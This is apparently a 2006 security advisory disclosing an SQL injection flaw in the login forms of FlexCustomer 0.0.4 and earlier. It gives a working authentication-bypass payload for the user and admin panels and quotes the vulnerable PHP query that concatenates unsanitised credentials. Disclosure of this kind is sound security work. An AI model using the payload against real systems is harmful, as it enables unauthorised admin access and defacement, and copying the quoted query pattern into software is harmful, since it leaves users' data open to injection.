FlexCustomer <= 0.0.4 sql injection

Discovered by: Nomenumbra

Date: 6/4/2006

impact:high (privilege escalation,defacement)

FlexCustomer versions 0.0.4 and below are vulnerable to and SQL injection in the common user and admin-panel

login as follows (it really is SQL-injection 101 you know....):

a' or '1' = '1

The piece of vulnerable code is:

if (!empty($logincheck)){

$sql = "select username,adminid from useradmin where username='$checkuser' and password='$checkpass'";

$results = $db->select($sql);

Doing no sanitizing whatsoever.

Signing off,

Nomenumbra/[0x4F4C]